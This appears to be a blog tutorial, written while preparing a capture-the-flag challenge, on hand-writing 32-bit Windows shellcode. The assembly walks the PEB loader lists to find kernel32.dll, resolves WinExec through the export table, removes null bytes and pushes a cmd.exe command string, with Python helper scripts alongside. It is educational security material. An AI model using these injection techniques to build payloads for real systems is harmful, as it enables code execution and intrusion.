Windows Shellcoding - 1 : Using WinExec

I was busy building some mini hells as challenges for ISSessions CTF 2025 when, while learning how malware is made (nothing illegal, promise), I stumbled upon the idea of incorporating shellcode into one of them.

So I went in all ambitious, only to have my hopes and dreams mercilessly crushed by Windows. After spending a day buried in Windows API documentation, with a few visits to the NT API docs that ended with me questioning my life choices, I finally found something. Let me show you.

First, the process of making Windows syscalls. Apparently it isn't simple because, as with everything, Windows takes pleasure in being difficult. You call the Windows API, which is a wrapper around the NT API (Native API), which in turn is a wrapper around the actual syscall, so the chain goes Windows API > NT API > syscall.

The NT API functions are implemented in ntdll.dll, while the Windows API is split across several DLLs such as kernel32.dll, user32.dll, etc.

So whenever you start a program, ntdll.dll and kernel32.dll get loaded, since they provide basic functionality. You can see this with the ListDLLs tool that comes with the Sysinternals Suite.

As you can see, notepad.exe here loaded ntdll.dll, then kernel32.dll, and then kernelbase.dll. The base addresses of these DLLs stay constant until the next reboot: with ASLR, system DLLs get their base address chosen once per boot, are mapped into memory once, and are then shared by every process that uses them.

Technically, you could just pull the address from here and hardcode it in your shellcode, and it would work, but only on the current machine and only until the next reboot.

So I needed a way to get the address dynamically, and since these DLLs are loaded by every program, there had to be something.

There is a very helpful structure for this kind of information: the Thread Environment Block (TEB). It is reachable through the FS segment register on x86 (GS on x64) and holds a lot of information about the currently running thread.

We are, however, only interested in the value stored at FS:[0x30] on x86 (GS:[0x60] on x64): the linear address of the Process Environment Block (PEB).


Assuming we're working with a 32-bit PE, the Ldr field, a pointer to the PEB_LDR_DATA structure, sits 0x0C bytes from the beginning of the PEB. PEB_LDR_DATA contains a very helpful list:

This is the head of a doubly linked list, InMemoryOrderModuleList, whose entries describe the modules loaded in memory, in the same order we saw in the ListDLLs output.

Again assuming a 32-bit PE, this list head sits at offset 0x14 from the base address of PEB_LDR_DATA.

To verify all this, I compiled a very basic C program as a 32-bit executable and opened it in WinDbg.

Note: This is my main machine; the ListDLLs output was from a VM, so the base addresses of ntdll.dll, kernel32.dll and kernelbase.dll differ.

Anyway, moving on: I found Ldr at exactly +0x0C (+0x18 on x64).

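Following Ldr, I was able to get the linked list, or rather lists. The documentation only names InMemoryOrderModuleList and marks the rest as reserved or leaves it out; the other two are InLoadOrderModuleList and InInitializationOrderModuleList.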

And, as expected, InMemoryOrderModuleList is at +0x14 (+0x20 on x64).

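Each link in this list points into an LDR_DATA_TABLE_ENTRY, a structure that stores information about a loaded module. We're only interested in one field of it: DllBase, the base address of the loaded DLL.

On a 32-bit system, DllBase sits 0x18 (24) bytes from the start of LDR_DATA_TABLE_ENTRY: it is preceded by two reserved pointers (2*4 bytes), the InMemoryOrderLinks LIST_ENTRY (a struct of two pointers, so 8 bytes) and two more reserved pointers (2*4 bytes). However, the Flink we follow points at InMemoryOrderLinks, which is itself 8 bytes into the structure, so relative to that pointer DllBase is at 0x18 - 0x08 = +0x10.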
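To double-check the offsets above for both bitnesses, here's a small Python sketch that lays out the leading fields of PEB, PEB_LDR_DATA and LDR_DATA_TABLE_ENTRY with C natural alignment for a given pointer size. The field names and order are an assumption on my part, following the commonly published layouts (what WinDbg's `dt` shows), truncated to the fields we need, so confirm them against your own debugger.

```python
def struct_offsets(fields):
    """Lay out (name, size, align) fields with C natural alignment; return {name: offset}."""
    offsets, off = {}, 0
    for name, size, align in fields:
        off = (off + align - 1) // align * align  # round up to the field's alignment
        offsets[name] = off
        off += size
    return offsets


def layouts(ptr):
    """Leading fields (assumed layout) of PEB, PEB_LDR_DATA, LDR_DATA_TABLE_ENTRY for ptr = 4 or 8."""
    list_entry = (2 * ptr, ptr)  # LIST_ENTRY = { Flink, Blink }
    peb = struct_offsets([
        ("InheritedAddressSpace", 1, 1),
        ("ReadImageFileExecOptions", 1, 1),
        ("BeingDebugged", 1, 1),
        ("BitField", 1, 1),
        ("Mutant", ptr, ptr),
        ("ImageBaseAddress", ptr, ptr),
        ("Ldr", ptr, ptr),
    ])
    ldr = struct_offsets([
        ("Length", 4, 4),
        ("Initialized", 1, 1),
        ("SsHandle", ptr, ptr),
        ("InLoadOrderModuleList", *list_entry),
        ("InMemoryOrderModuleList", *list_entry),
        ("InInitializationOrderModuleList", *list_entry),
    ])
    entry = struct_offsets([
        ("InLoadOrderLinks", *list_entry),
        ("InMemoryOrderLinks", *list_entry),
        ("InInitializationOrderLinks", *list_entry),
        ("DllBase", ptr, ptr),
    ])
    return peb, ldr, entry


for ptr, arch in ((4, "x86"), (8, "x64")):
    peb, ldr, entry = layouts(ptr)
    # The Flink we follow points at InMemoryOrderLinks, not at the start of the entry
    dll_base_from_link = entry["DllBase"] - entry["InMemoryOrderLinks"]
    print(f"{arch}: PEB.Ldr=+{peb['Ldr']:#x} "
          f"Ldr.InMemoryOrderModuleList=+{ldr['InMemoryOrderModuleList']:#x} "
          f"DllBase from link=+{dll_base_from_link:#x}")
```

On x86 this gives +0xc, +0x14 and +0x10, matching what WinDbg showed; on x64 it gives +0x18, +0x20 and +0x20.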

Now that all of that is verified, let's move on to a simple assembly program that gets us the base addresses of ntdll.dll and kernel32.dll, i.e., the second and third modules to be loaded.

    mov ebx, fs:0x30        ; PEB
    mov ebx, [ebx + 0x0C]   ; Ldr
    mov ebx, [ebx + 0x14]   ; InMemoryOrderModuleList
    mov ebx, [ebx]          ; Flink (the executable itself)
    mov ebx, [ebx]          ; Flink (ntdll.dll)
    mov ebx, [ebx + 0x10]   ; BaseAddress
    mov ebx, [ebx]          ; Flink (kernel32.dll)
    mov ebx, [ebx + 0x10]   ; BaseAddress

This should load the base addresses of ntdll.dll and then kernel32.dll into ebx (I was using eax initially, but that left several null bytes in the objdump output). Let's assemble it, inject it into the 32-bit executable I made earlier, and run that in x32dbg.

A little touch of bash and we have the hex. There are still null bytes, which I couldn't figure out how to remove, so I guess I'll have to see how it goes.

objdump -d ./shell.o|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' ' \
 |tr -s ' '|tr '\t' ' '|sed 's/ $//g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
" 64 8b 1d 30 00 00 8b 5b 0c 8b 5b 14 8b 1b 8b 1b 8b 5b 10 8b 1b 8b 5b 10"

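The null bytes caused a minor complication: `cut -f1-6` keeps at most six bytes per instruction, so the 7-byte `mov ebx, fs:0x30` (64 8b 1d 30 00 00 00) lost its last 00, which I fixed by manually adding it back to match the disassembly of the file.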
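If the bash pipeline gets fiddly, the same extraction can be done in Python. This is a rough sketch, assuming GNU objdump's default `objdump -d` line format (`offset:<TAB>hex bytes<TAB>mnemonic`); it keeps every byte of long instructions instead of cutting at six and reports where the null bytes are. The sample lines are hand-written for illustration to match that format, not real tool output.

```python
import re

# "   0:\t64 8b 1d 30 00 00 00 \tmov ..." -> captures "64 8b 1d 30 00 00 00"
# Continuation lines (bytes only, no mnemonic) are matched too.
LINE_RE = re.compile(r"^\s*[0-9a-f]+:\t((?:[0-9a-f]{2} )*[0-9a-f]{2})")


def objdump_bytes(text):
    """Concatenate the machine-code bytes from `objdump -d` output."""
    code = bytearray()
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            code += bytes.fromhex(m.group(1))
    return bytes(code)


def as_c_string(code):
    """Format bytes as a C-style "\\x.." string literal."""
    return '"' + "".join(f"\\x{b:02x}" for b in code) + '"'


def null_offsets(code):
    """Offsets of every 0x00 byte in the shellcode."""
    return [i for i, b in enumerate(code) if b == 0]


sample = (
    "   0:\t64 8b 1d 30 00 00 00 \tmov    %fs:0x30,%ebx\n"
    "   7:\t8b 5b 0c             \tmov    0xc(%ebx),%ebx\n"
)
code = objdump_bytes(sample)
print(as_c_string(code))   # "\x64\x8b\x1d\x30\x00\x00\x00\x8b\x5b\x0c"
print(null_offsets(code))  # [4, 5, 6]
```

In practice you would feed it the output of `objdump -d ./shell.o` instead of the sample string.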

After running it, I realised I was a bit off the mark: for some reason, the first base address I pulled, which was supposed to be ntdll.dll's, turned out to be kernel32.dll's.

ebx : 75DB0000     kernel32.75DB0000

If you check it against the base listed in the WinDbg screenshot, it's the same one.

Intrigued by this development, I removed one of the `mov ebx, [ebx]` instructions by editing out its bytes (8B 1B), which gave me the address of ntdll.dll instead.

ebx : 77530000     ntdll.77530000
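To see why dropping one dereference lands on ntdll.dll, here's a Python sketch that simulates the walk over a toy memory map. Every structure address in it is made up (only the two DLL bases are borrowed from the debugger output above, and 0x00400000 for the executable is just a typical value); the point is the pointer chasing: the list head's Flink already points at the first entry, so the original snippet's two `mov ebx, [ebx]` correspond to index 2, kernel32.dll.

```python
# Toy 32-bit memory: address -> dword. All structure addresses are hypothetical.
PEB, LDR = 0x1000, 0x2000
EXE, NTDLL, K32 = 0x3000, 0x4000, 0x5000   # starts of LDR_DATA_TABLE_ENTRY structs
LINKS = 0x08                               # InMemoryOrderLinks offset in an entry (x86)

mem = {
    PEB + 0x0C: LDR,                     # PEB.Ldr
    LDR + 0x14: EXE + LINKS,             # InMemoryOrderModuleList.Flink -> first entry
    EXE + LINKS: NTDLL + LINKS,          # each Flink points at the next entry's links
    NTDLL + LINKS: K32 + LINKS,
    K32 + LINKS: LDR + 0x14,             # last entry wraps back to the list head
    EXE + LINKS + 0x10: 0x00400000,      # DllBase, +0x10 from the links pointer
    NTDLL + LINKS + 0x10: 0x77530000,
    K32 + LINKS + 0x10: 0x75DB0000,
}  # only Flinks are modelled; Blinks are not needed for this walk


def module_base(mem, peb, index):
    """Follow the same steps as the assembly: index 0 is the first entry (the .exe)."""
    link = mem[mem[peb + 0x0C] + 0x14]   # mov ebx, [ebx + 0x0C] / mov ebx, [ebx + 0x14]
    for _ in range(index):
        link = mem[link]                 # mov ebx, [ebx]  (Flink)
    return mem[link + 0x10]              # mov ebx, [ebx + 0x10]  (DllBase)


for i, name in enumerate(["exe", "ntdll.dll", "kernel32.dll"]):
    print(f"{name}: {module_base(mem, PEB, i):#010x}")
```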

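I realised a bit late that the head's Flink already points at the first entry (the executable itself), so one dereference fewer is needed. Here is the updated assembly to get the base address of kernel32.dll. After a bit of research, I also found that I could eliminate the null bytes at the beginning by adding a zeroed register to the `fs:0x30` address: with a base register, the 0x30 offset fits in a one-byte displacement instead of a four-byte absolute address.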

    xor eax, eax
    mov ebx, [fs:0x30 + eax]    ; PEB
    mov ebx, [ebx + 0x0C]       ; PEB_LDR_DATA
    mov ebx, [ebx + 0x14]       ; InMemoryOrderModuleList (first entry)
    mov ebx, [ebx]              ; Flink (ntdll.dll)
    mov ebx, [ebx]              ; Flink (kernel32.dll)
    mov ebx, [ebx + 0x10]       ; BaseAddress

You can use ecx to store the addresses too if you want; it's just eax that ends up leaving multiple runs of null bytes in the shellcode.
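Why does the extra register help? Here's a rough Python sketch of the x86 ModRM arithmetic behind it. `mov ebx, fs:[0x30]` has no base register, so it needs the mod=00/rm=101 form with a full 32-bit displacement (three 00 bytes), while `[eax + 0x30]` can use mod=01 with a one-byte displacement. The byte values are the standard encodings (FS prefix 64, opcode 8B /r, and 31 C0 for `xor eax, eax`); an assembler may still choose a different but equivalent form, so compare against your own objdump.

```python
FS_PREFIX = 0x64
MOV_R32_RM32 = 0x8B                      # mov r32, r/m32
# esp/ebp are left out on purpose: as a base they need SIB or special encodings
REG = {"eax": 0, "ecx": 1, "edx": 2, "ebx": 3}


def modrm(mod, reg, rm):
    """Pack the ModRM byte: mod (2 bits) | reg (3 bits) | rm (3 bits)."""
    return (mod << 6) | (reg << 3) | rm


def mov_fs_abs(dst, disp):
    """mov dst, fs:[disp32]: mod=00, rm=101 means 'no base, 32-bit displacement'."""
    return bytes([FS_PREFIX, MOV_R32_RM32, modrm(0b00, REG[dst], 0b101)]) + disp.to_bytes(4, "little")


def mov_fs_base_disp8(dst, base, disp):
    """mov dst, fs:[base + disp8]: mod=01 means 'base register + 8-bit displacement'."""
    assert -128 <= disp <= 127, "displacement must fit in a signed byte"
    return bytes([FS_PREFIX, MOV_R32_RM32, modrm(0b01, REG[dst], REG[base]), disp & 0xFF])


xor_eax = bytes([0x31, 0xC0])            # xor eax, eax
old = mov_fs_abs("ebx", 0x30)
new = xor_eax + mov_fs_base_disp8("ebx", "eax", 0x30)
print(old.hex(" "))   # 64 8b 1d 30 00 00 00
print(new.hex(" "))   # 31 c0 64 8b 58 30
```

The first line matches the start of the hex dump from earlier, and the second form contains no 00 bytes at all.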

Moving on, I opened kernel32.dll in PEview to look at its exports, find WinExec, and work out a way to get to it in assembly.

Looking at the headers, and with some research online, I found that one field of the DOS header, e_lfanew, is always at the same place: +0x3C from the base address.

It holds the offset (RVA) of the PE signature, and the Export Table RVA in turn sits a constant 0x78 bytes past the PE signature (for 32-bit PE32 images; it is 0x88 for PE32+).

Note: an RVA (relative virtual address) is relative to the module's base address, so at runtime base addr. + RVA gives the actual address. For example, when the module is in memory, the PE header is at base addr. + e_lfanew.

Moving on to the Export Table, i.e., the IMAGE_EXPORT_DIRECTORY: the number of exported functions is at +0x14 from its start and the number of exported names at +0x18, the RVA of the Address Table is at +0x1C, the Name Pointer Table at +0x20 and, finally, the Ordinal Table at +0x24.

The Address Table, as the name suggests, holds the addresses (as RVAs) of the exported functions.

Name Pointer Table entries are RVAs pointing to null-terminated strings that serve as the names of the exported functions.

The Ordinal Table runs parallel to the Name Pointer Table: for each name, it holds a 16-bit ordinal, which is the index of that function in the Address Table. This is also what allows a function to be accessed by its ordinal number.

So I need the addresses of these three tables to be able to call WinExec.
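Here's what the whole lookup amounts to, as a Python sketch over a mapped 32-bit image held in a byte buffer. In memory, an RVA is simply an offset from the base, so no section translation is needed (a DLL file read straight from disk would need it). The test image is a hypothetical, hand-built stub containing only the fields the lookup reads, with the Address Table deliberately stored in reverse so the ordinal indirection actually matters. It loops over NumberOfNames (+0x18), since that is how many entries the Name Pointer Table has.

```python
import struct


def u32(img, off):
    return struct.unpack_from("<I", img, off)[0]


def u16(img, off):
    return struct.unpack_from("<H", img, off)[0]


def c_string(img, off):
    return bytes(img[off:img.index(b"\x00", off)])


def resolve_export(img, name):
    """Return the function RVA for `name` in a mapped PE32 image (RVA == offset)."""
    pe = u32(img, 0x3C)                  # e_lfanew -> "PE\0\0" signature
    exports = u32(img, pe + 0x78)        # Export Table RVA (0x88 for PE32+)
    n_names = u32(img, exports + 0x18)   # NumberOfNames
    addr_table = u32(img, exports + 0x1C)
    name_table = u32(img, exports + 0x20)
    ord_table = u32(img, exports + 0x24)
    for i in range(n_names):
        if c_string(img, u32(img, name_table + 4 * i)) == name:
            ordinal = u16(img, ord_table + 2 * i)    # 16-bit index into Address Table
            return u32(img, addr_table + 4 * ordinal)
    raise KeyError(name)


def build_stub(exports):
    """Hypothetical minimal image: only the fields resolve_export() reads."""
    img = bytearray(0x1000)
    pe, exp, funcs, names, ords, strs = 0x80, 0x200, 0x300, 0x400, 0x500, 0x600
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, pe)
    img[pe:pe + 4] = b"PE\0\0"
    struct.pack_into("<I", img, pe + 0x78, exp)
    n = len(exports)
    # NumberOfFunctions, NumberOfNames, AddressOfFunctions, AddressOfNames, AddressOfNameOrdinals
    struct.pack_into("<5I", img, exp + 0x14, n, n, funcs, names, ords)
    for i, (fname, rva) in enumerate(exports):
        slot = n - 1 - i                             # reversed, so ordinals matter
        struct.pack_into("<I", img, funcs + 4 * slot, rva)
        struct.pack_into("<I", img, names + 4 * i, strs)
        struct.pack_into("<H", img, ords + 2 * i, slot)
        img[strs:strs + len(fname)] = fname          # buffer is zeroed: NUL-terminated
        strs += len(fname) + 1
    return bytes(img)


stub = build_stub([(b"WinExec", 0x1234), (b"Wow64DisableWow64FsRedirection", 0x5678)])
print(hex(resolve_export(stub, b"WinExec")))   # 0x1234
```

Adding the returned RVA to the module's base address gives the callable address, exactly as with the other RVAs.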

; look for address of Address Table, Name Pointer Table & Ordinal Table in kernel32.dll
mov eax, [ebx + 0x3C]   ; PE Signature RVA (base + 0x3C)
add eax, ebx            ; PE Signature addr.
mov eax, [eax + 0x78]   ; Export Table RVA (PE addr. + 0x78)
add eax, ebx            ; Export Table addr.

mov edx, [eax + 0x18]   ; Number of exported names (NumberOfNames), i.e. entries in the Name Pointer Table

mov ecx, [eax + 0x1C]   ; RVA of Address Table (Export Table addr. + 0x1C)
add ecx, ebx            ; Addr. of Address Table
mov [ebp - 0x0C], ecx   ; Store Address Table addr. in var C

mov ecx, [eax + 0x20]   ; RVA of Name Pointer Table (Export Table addr. + 0x20)
add ecx, ebx            ; Addr. of Name Pointer Table
mov [ebp - 0x10], ecx   ; Store Name Pointer Table addr. in var 10

mov ecx, [eax + 0x24]   ; RVA of Ordinal Table (Export Table addr. + 0x24)
add ecx, ebx            ; Addr. of Ordinal Table
mov [ebp - 0x14], ecx   ; Store Ordinal Table addr. in var 14

Assuming my previous snippet left the base address of kernel32.dll in ebx, this saves those addresses to memory.

I was a bit anxious, so I ran a little verification by injecting this code into my 32-bit executable and running it in x32dbg to check whether the values were loaded correctly, and I was almost jumping for joy because they were. I had spent almost two days on this challenge XD

Next step: loop through the Name Pointer Table to look for "WinExec".

Initially I came up with some basic logic, with help from online references:

; look for the string
; (assumes eax, the name index, was zeroed before the first .scan)
.scan:
    mov edi, [ebp - 0x10]   ; Name Pointer Table addr.
    mov esi, [ebp - 0x04]   ; String "WinExec"
    xor ecx, ecx            ; clear the character counter
    cld                     ; clear direction flag so strings are read left to right

    ; since we reload the base address of the Name Pointer Table into edi every turn,
    ; and each entry is 4 bytes, just index by position (eax) * 4 bytes;
    ; that gets us the RVA of the n'th entry
    mov edi, [edi + eax * 0x04]
    add edi, ebx    ; get addr. of n'th name

    add cx, 0x07    ; number of bytes to compare in "WinExec"
    repe cmpsb      ; compare [esi] and [edi] byte by byte while equal and ecx != 0
    jz sc.good      ; if all bytes matched (ZF=1), jump to the label 'good'

    inc eax         ; increment counter
    cmp eax, edx    ; check whether we reached the last exported name
    jb sc.scan      ; if eax < edx, continue loop

    jmp sc.fin

I initially had scasb/scasd in mind for the comparison, but on further research I found that those instructions are better suited to scanning for a value (say, a character) within a string, so I settled on cmpsb, which compares two strings side by side and was closer to what I needed.
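For reference, here's a simplified Python model of what `repe cmpsb` does with the direction flag clear: compare [esi] with [edi], advance both, decrement ecx, and stop when ecx reaches zero or a pair differs. ZF from the last comparison, not ecx, is what tells you whether everything matched. It is only a model (flags other than ZF are ignored), and the memory contents are made up for illustration.

```python
def repe_cmpsb(mem, esi, edi, ecx):
    """Model of `repe cmpsb` with DF=0; returns (zf, esi, edi, ecx) afterwards."""
    zf = None                    # flags unchanged if ecx starts at 0 (no comparison done)
    while ecx != 0:
        zf = mem[esi] == mem[edi]
        esi, edi, ecx = esi + 1, edi + 1, ecx - 1
        if not zf:               # repe stops on the first mismatch
            break
    return zf, esi, edi, ecx


# Hypothetical memory: the needle at 0x00 and a couple of export names elsewhere
mem = bytearray(0x100)
mem[0x00:0x07] = b"WinExec"
mem[0x40:0x48] = b"WinExec\x00"
mem[0x60:0x74] = b"WideCharToMultiByte\x00"

print(repe_cmpsb(mem, 0x00, 0x40, 7))   # (True, 7, 71, 0)   full match
print(repe_cmpsb(mem, 0x00, 0x60, 7))   # (False, 3, 99, 4)  'n' vs 'd' at index 2
```

Note that esi and edi are left pointing past the compared bytes either way, so anything after the loop that reuses them has to account for that.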

So here's a funny thing: initially I was moving 0x08 into the character counter to compare the first 8 bytes, i.e., the 7 characters of "WinExec" + 1 null byte, which seems perfectly logical.

But when I ran this as injected code in x32dbg, I got an 'Access Violation' exception. Confused, I ran through the code again, and apparently it was getting the address of 'Wow64DisableWow64FsRedirection', which, looking at kernel32.dll, is the entry right after 'WinExec'.

I carefully stepped through the comparison routine again, manually adjusting the position counter so I wouldn't have to sit through 1,536 (0x600) comparisons, since I knew from the DLL's Name Pointer Table that 'WinExec' sits past at least the 1,568th (0x620) entry.

When I arrived at the comparison where 'WinExec' was loaded into edi, the comparison went normally, but the value left in cx at the end was 0x2. That seemed to be the root of the issue, as it caused the address stored in edi to be incremented by one, handing me 'Wow64DisableWow64FsRedirection' instead of 'WinExec'. So I tried setting cx to 0x7, i.e., not accounting for the null byte, to see if that would work.

It worked perfectly. But when I got to pushing my command, 'C:\\Windows\\System32\\cmd.exe /c \"flag\" > flag.txt', converting it into hex and swapping the endianness, I forgot to add 'echo', so I was presented with another error saying that flag was not an operable batch file. This time I couldn't blame cmd.exe for being absolute trash, since it was actually my mistake.

Going through the push statements was the most troublesome part: converting a string to hex and then swapping it from big endian to little endian for our poor x86 CPU, which is little-endian.

I got tired of doing this chore by hand, so I decided: why not use the holy grail for chores nobody wants to do? Yes, automating it in Python (it did take me about 20 minutes to debug, as I hadn't touched Python in ages).

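# Get input from user
iStr = input("Enter the string: ")

# Convert string to bytes
bStr = iStr.encode('utf-8')

# Convert bytes to hex (2 hex chars per byte)
hStr = bStr.hex()

# Split hex string into chunks of 4 bytes (8 hex chars)
byteChunks = [hStr[i:i+8] for i in range(0, len(hStr), 8)]

# A short last chunk is padded with zero bytes in the pushed dword, which
# null-terminates the string (but puts 00 bytes in the push immediate).
# If the length is a multiple of 4, nothing terminates it, so push a zero
# dword first without a null byte in the shellcode.
if len(bStr) % 4 == 0:
    print("xor eax, eax\npush eax")

# Print each chunk in the order it will go on the stack (last chunk first)
for chunk in reversed(byteChunks):
    # switch bytes from big endian to little endian
    chunk = chunk[6:8] + chunk[4:6] + chunk[2:4] + chunk[0:2]
    print("push 0x" + chunk)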
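A quick way to sanity-check the chunk order and byte swap is to simulate the pushes. This Python sketch (the helper names are mine) models `push imm32` on a downward-growing stack and reads the bytes back from ESP. It also shows the catch that a string whose length is a multiple of 4 gets no terminating NUL from the pushes alone.

```python
def push_dwords(s):
    """Dwords in push order, like the script: last 4-byte chunk first."""
    data = s.encode("utf-8")
    chunks = [data[i:i + 4] for i in range(0, len(data), 4)]
    # little-endian: the first character becomes the lowest byte of the dword;
    # a short final chunk leaves its high bytes as 0
    return [int.from_bytes(c, "little") for c in reversed(chunks)]


def memory_at_esp(values):
    """Model successive `push imm32`: each push writes 4 bytes just below the previous ones."""
    stack = b""
    for v in values:
        stack = v.to_bytes(4, "little") + stack
    return stack


cmd = "cmd.exe /c echo hi"                  # 18 bytes -> last chunk is b"hi"
print(memory_at_esp(push_dwords(cmd)))      # b'cmd.exe /c echo hi\x00\x00'
print(memory_at_esp(push_dwords("calc")))   # b'calc' (no terminator!)
```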

With that, everything was set, and I shed tears of happiness when the shellcode finally worked without issues all the way through. I had sunk two days into this.

I also learnt a lot in that time, though. Here's the whole code if you want to look at it. I believe the same principle can be applied to calling other Windows API functions, as long as we set up their arguments properly on the stack.

Oh, a side note: when using WinExec to call cmd with the /c option, cmd doesn't like null bytes in its command; I learnt this the hard way.
